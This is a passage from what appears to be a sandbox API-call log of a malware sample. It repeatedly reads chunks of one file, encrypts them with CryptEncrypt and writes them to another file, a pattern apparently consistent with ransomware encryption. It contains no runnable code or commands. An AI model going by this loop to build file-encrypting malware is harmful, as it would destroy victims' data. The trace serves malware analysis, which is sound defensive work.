lpOverlapped=0x0) returned 1 [0271.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.256] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.256] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.256] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.256] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.256] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.256] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.257] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.258] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.258] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.259] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.259] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.260] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.261] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] ReadFile (in: 